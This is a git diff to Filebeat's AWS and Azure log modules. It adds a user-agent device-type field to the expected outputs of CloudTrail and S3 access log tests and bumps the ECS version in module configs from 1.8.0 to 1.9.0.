--git a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json index 47691a242dc..2b8a53f8fb3 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/assume-role-json.log-expected.json @@ -75,6 +75,7 @@ "user.id": "AROAIN5ATK5U7KEXAMPLE:JohnRole1", "user.name": "JohnDoe", "user_agent.device.name": "Spider", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.248 Python/3.4.7 Linux/4.9.184-0.1.ac.235.83.329.metal1.x86_64 botocore/1.12.239", "user_agent.os.full": "Linux 4.9.184", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json index f6bb959a8d6..2cf3e55f60e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/change-password-json.log-expected.json @@ -41,6 +41,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" @@ -85,6 +86,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json index ca6b38754cb..790e4dfe383 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/console-login-json.log-expected.json @@ -44,6 +44,7 @@ "user.id": "AIDACKCEVSQ6C2EXAMPLE", "user.name": "JohnDoe", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "user_agent.os.full": "Windows 7", @@ -97,6 +98,7 @@ "user.id": "AIDACKCEVSQ6C2EXAMPLE", "user.name": "JaneDoe", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "user_agent.os.full": "Windows 7", @@ -153,6 +155,7 @@ "user.id": "AROAIDPPEZS35WEXAMPLE:AssumedRoleSessionName", "user.name": "RoleToBeAssumed", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0", "user_agent.os.full": "Windows 7", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json index bfce5b07ccb..5c693213066 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-access-key-json.log-expected.json @@ -51,6 +51,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json index 7487c6d6581..7df2dcb82db 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json @@ -52,6 +52,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" }, @@ -100,6 +101,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json index f2ce56d3683..9f5a5d4c47e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json @@ -54,6 +54,7 @@ "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Other", "user_agent.original": "EC2ConsoleBackend, aws-sdk-java/Linux/x.xx.fleetxen Java_HotSpot(TM)_64-Bit_Server_VM/xx", "user_agent.os.name": "Linux" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json index 66e126a2da2..07ecdb03589 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json @@ -53,6 +53,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json index 65b0db2d293..50852344f39 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json @@ -47,6 +47,7 @@ "user.target.id": "EXAMPLEUSERID", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.3.2 Python/2.7.5 Windows/7", "user_agent.os.name": "Windows", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json index 5ab34b15c5f..f92a8bcea77 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json @@ -46,6 +46,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "console.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json index 2639ed8a490..90280fe3dde 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json index 8146718df72..2bdaaa2d56b 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json @@ -47,6 +47,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json index a75b479f1f7..53aac5608fc 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-bucket-json.log-expected.json @@ -43,6 +43,7 @@ "user.id": "AIDAQRSTUVWXYZEXAMPLE:devdsk", "user.name": "AssumeNothing", "user_agent.device.name": "Spider", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "[aws-cli/1.11.10 Python/2.7.8 Linux/3.2.45-0.6.wd.865.49.315.metal1.x86_64 botocore/1.4.67]", "user_agent.os.full": "Linux 3.2.45", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json index d1c2ab6f9e7..a07e22e8cdc 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json @@ -45,6 +45,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" }, @@ -93,6 +94,7 @@ "user.id": "EXAMPLE_PRINCIPLE", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json index d1f4415d4cd..a33b2e39127 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json @@ -47,6 +47,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json index 58a7d7a36ad..94defa8dcb9 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json @@ -36,6 +36,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json index ac0c0163b5d..6607e3567c5 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json index ec713a1c41b..c7b26ce8440 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json @@ -44,6 +44,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json index f89c1b5ab53..22dd8a46738 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json @@ -36,6 +36,7 @@ "user.id": "REDACTED", "user.name": "REDACTED", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "REDACTED" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json index 253bf3d4523..da3ab76071d 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "console.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json index 419a86799cc..558bf96826d 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json @@ -48,6 +48,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json index 5d7299ae4c2..bfd33924614 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json @@ -39,6 +39,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json index 266cded86f2..5463d50587b 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json @@ -39,6 +39,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json index 4b30eaed7ae..9a3463220a9 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json @@ -48,6 +48,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json index edb7444604b..3f5caf284b7 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json @@ -49,6 +49,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json index 95827327cec..43bc59eaf80 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json @@ -43,6 +43,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" @@ -93,6 +94,7 @@ "user.id": "0123456789012", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json index 6992dc1a978..907a935f53f 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json index 12efc4cf071..1d5fe8f519a 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json @@ -48,6 +48,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" }, @@ -100,6 +101,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json index 1d00ae0c171..7174ce8774e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json @@ -47,6 +47,7 @@ "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", "user_agent.device.name": "Spider", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.10.32 Python/2.7.9 Windows/7 botocore/1.4.22", "user_agent.os.name": "Windows", @@ -107,6 +108,7 @@ "user.id": "EXAMPLE_ID", "user.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json index 068c1db631a..28a6ffc218f 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json @@ -46,6 +46,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Spider", + "user_agent.device.type": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", "user_agent.version": "1.16.310" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json index d81ec8fa25b..b57283c9d75 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json @@ -47,6 +47,7 @@ "user.name": "Alice", "user.target.name": "Alice", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" } diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml index c156fac870b..9d0605877da 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml index 8e04baa3395..1feedff152e 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml index c156fac870b..9d0605877da 100644 --- a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/file.yml b/x-pack/filebeat/module/aws/ec2/config/file.yml index 8e04baa3395..1feedff152e 100644 --- a/x-pack/filebeat/module/aws/ec2/config/file.yml +++ b/x-pack/filebeat/module/aws/ec2/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml index c156fac870b..9d0605877da 100644 --- a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/elb/config/file.yml b/x-pack/filebeat/module/aws/elb/config/file.yml index 4242dc4cd7b..a2e28f634ea 100644 --- a/x-pack/filebeat/module/aws/elb/config/file.yml +++ b/x-pack/filebeat/module/aws/elb/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml index c156fac870b..9d0605877da 100644 --- a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/s3access/config/file.yml b/x-pack/filebeat/module/aws/s3access/config/file.yml index 4242dc4cd7b..a2e28f634ea 100644 --- a/x-pack/filebeat/module/aws/s3access/config/file.yml +++ b/x-pack/filebeat/module/aws/s3access/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json index aa9d1bf6938..4f260cc6118 100644 --- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json @@ -66,6 +66,7 @@ "url.path": "/test-s3-ks/", "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", @@ -140,6 +141,7 @@ "url.path": "/test-s3-ks/", "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", @@ -215,6 +217,7 @@ "url.path": "/test-s3-ks/", "url.query": "max-keys=0&encoding-type=url&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", @@ -289,6 +292,7 @@ "url.path": "/test-s3-ks/", "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", "user_agent.os.full": "Linux 4.9.137", diff --git a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json index f6ca4d4edf3..de66c40e801 100644 --- a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json @@ -58,6 +58,7 @@ "url.path": "/awsexamplebucket", "url.query": "versioning", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -120,6 +121,7 @@ "url.path": "/awsexamplebucket", "url.query": "logging", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -184,6 +186,7 @@ "url.path": "/awsexamplebucket", "url.query": "policy", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -246,6 +249,7 @@ "url.path": "/awsexamplebucket", "url.query": "versioning", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -308,6 +312,7 @@ "url.original": "/awsexamplebucket/s3-dg.pdf", "url.path": "/awsexamplebucket/s3-dg.pdf", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" }, @@ -369,6 +374,7 @@ "tls.version_protocol": "tls", "url.original": "*", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" } diff --git a/x-pack/filebeat/module/aws/vpcflow/config/input.yml b/x-pack/filebeat/module/aws/vpcflow/config/input.yml index 1f1e085c082..54b45591f79 100644 --- a/x-pack/filebeat/module/aws/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/aws/vpcflow/config/input.yml @@ -181,4 +181,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml index a949730a58f..9cb926a5990 100644 --- a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml @@ -31,4 +31,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/config/file.yml b/x-pack/filebeat/module/azure/activitylogs/config/file.yml index 4242dc4cd7b..a2e28f634ea 100644 --- a/x-pack/filebeat/module/azure/activitylogs/config/file.yml +++ b/x-pack/filebeat/module/azure/activitylogs/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + 